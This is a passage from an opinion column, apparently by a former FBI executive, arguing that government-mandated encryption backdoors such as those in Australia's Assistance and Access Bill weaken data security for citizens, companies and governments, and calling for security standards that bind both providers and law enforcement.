Image: Bryce Durbin/TechCrunch

Newly created encryption backdoors and work-arounds will become the target of criminals, hackers, and hostile nation states, offering new opportunities for data compromise and attack through the newly created tools and the flawed code that inevitably accompanies some of them. These vulnerabilities undermine providers’ efforts to secure their customers’ data, creating new and powerful vulnerabilities even as companies struggle to address existing ones.

And these vulnerabilities would not only impact private citizens, but governments as well, including services and devices used by the law enforcement and national security communities. This comes amidst government efforts to significantly increase corporate responsibility for the security of customer data through laws such as the EU’s General Data Protection Regulation. Who will consumers, or the government, blame when a government-mandated backdoor is used by hackers to compromise user data? Who will be responsible for the damage?

Companies have a fiduciary responsibility to protect their customers’ data, which not only includes personally identifiable information (PII), but their intellectual property, financial data, and national security secrets.

Worse, the vulnerabilities created under laws such as the Assistance and Access Bill would be subject almost exclusively to the decisions of law enforcement authorities, leaving companies unable to make their own decisions about the security of their products. How can we expect a company to protect customer data when their most fundamental security decisions are out of their hands?

phone encryption

Image: Bryce Durbin/TechCrunch

Thus far law enforcement has chosen to downplay, if not ignore, these concerns—focusing singularly on getting the information they need. This is understandable—a law enforcement officer should use every power available to them to solve a case, just as I did when I served as a State Trooper and as a FBI Special Agent, including when I served as Executive Assistant Director (EAD) overseeing the San Bernardino terror attack case during my final months in 2015.

Decisions regarding these types of sweeping powers should not and cannot be left solely to law enforcement. It is up to the private sector, and our government, to weigh competing security and privacy interests. Our government cannot sacrifice the ability of companies and citizens to properly secure their data and systems’ security in the name of often vague physical and national security concerns, especially when there are other ways to remedy the concerns of law enforcement.

That said, these security responsibilities cut both ways. Recent data breaches demonstrate that many companies have a long way to go to adequately protect their customers’ data. Companies cannot reasonably cry foul over the negative security impacts of proposed law enforcement data access while continuing to neglect and undermine the security of their own users’ data.

Providers and the law enforcement community should be held to robust security standards that ensure the security of our citizens and their data—we need legal restrictions on how government accesses private data and on how private companies collect and use the same data.

There may not be an easy answer to the “going dark” issue, but it is time for all of us, in government and the private sector, to understand that enhanced data security through properly implemented encryption and data use policies is in everyone’s best interest.

The “extra ordinary” access sought by law enforcement cannot exist in a vacuum—it will have far reaching and significant impacts well beyond the narrow confines of a single investigation. It is time for a serious conversation between law enforcement and the private sector to recognize that their security interests are two sides of the same coin.

Powered by WPeMatico